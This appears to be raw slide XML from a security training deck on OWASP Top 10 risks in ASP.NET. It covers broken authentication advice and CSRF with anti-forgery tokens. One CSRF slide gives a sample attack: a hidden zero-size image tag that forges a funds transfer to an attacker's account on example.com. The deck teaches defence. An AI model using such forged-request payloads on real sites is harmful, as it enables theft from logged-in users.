            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7733841" y="1861852"/>
            <a:ext cx="3503364" cy="2208672"/>
          </a:xfrm>
          <a:prstGeom prst="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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="6843412"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3. Broken Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA9052F-76C8-4317-BAB6-B798547BCE08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068636" y="2677834"/>
            <a:ext cx="5739788" cy="1548660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78920A3F-686C-4DAE-A180-CF8469D9AB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068636" y="5188339"/>
            <a:ext cx="5133860" cy="1468348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D12B303-D568-42F3-AA43-23FE252A6177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079035" y="2071511"/>
            <a:ext cx="2893765" cy="343171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F0D4061-FB9E-489A-94CA-0601BCB8EE02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7932145" y="2677834"/>
            <a:ext cx="3040655" cy="1392689"/>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dirty="0"/>
              <a:t>By default, the forms timeout is sliding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It can be set to fixed by disabling sliding expiration </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="905268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DBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1567150"/>
            <a:ext cx="10876793" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>Other broken authentication patterns </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Credentials should always be stored in a cryptographically secure way </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More on that in part 7 on insecure cryptographic storage </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Implement robust minimum password criteria </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The membership provider makes this very easy </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Never send a password by email </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always implement a secure password reset process </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Protect session IDs in cookies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement robust protection against XSS risks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t transmit sensitive data over an insecure connection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="6843412"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3. Broken Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>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05711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DBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1567150"/>
            <a:ext cx="10876793" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUMMARY:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Keep session IDs out of the URL (use the more secure cookie default) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t expect anything in the URL to be secure </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Make use of the ASP.NET membership provider </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It abstracts away all the hard work of managing authentication </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r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Customise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> your session and forms timeout </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the right balance between convenient and secure </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>If possible, disable sliding forms authentication expiration </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider the potential adverse impact on usability </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remember that broken authentication and session management is a broad risk </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t forget the other areas of the Top 10 that can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jeopardise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> this one </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="6843412"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3. Broken Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>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637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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="10004662"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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRF – Cross site request forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="918043" y="3434298"/>
            <a:ext cx="10876793" cy="2954655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Example Attack Scenario </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The application allows a user to submit a state changing request that does not include anything secret. For example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/transferFunds?amount=1500 &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>destinationAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=4673243243</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>So, the attacker constructs a request that will transfer money from the victim’s account to the attacker’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://example.com/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>transferFunds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>? amount=1500&amp;destinationAccount=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackersAcct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#“ width="0" height="0" /&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>If the victim visits any of the attacker’s sites while already authenticated to example.com, these forged requests will automatically include the user’s session info, authorizing the attacker’s request. </a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A9C042-AE4F-4870-BFD2-706E406DEC22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="918044" y="903044"/>
            <a:ext cx="6360212" cy="2420486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3367839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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="10004662"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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRF – Cross site request forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1594480"/>
            <a:ext cx="10876793" cy="2985433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Understanding anti-forgery tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CSRF attacks work because they’re predictable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attack is merely reconstructing a request adhering to the same structure as a legitimate one (path and parameters) </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>To mitigate this risk, we can add randomness via a CSRF token </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A token is a random string known to both the legitimate page where the form is and to the browser via a cookie </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3066450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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="10004662"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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRF – Cross site request forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1594480"/>
            <a:ext cx="10876793" cy="1046440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Anti-forgery tokens in action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71FC2B67-8265-4CE0-8B06-1F195BF41064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
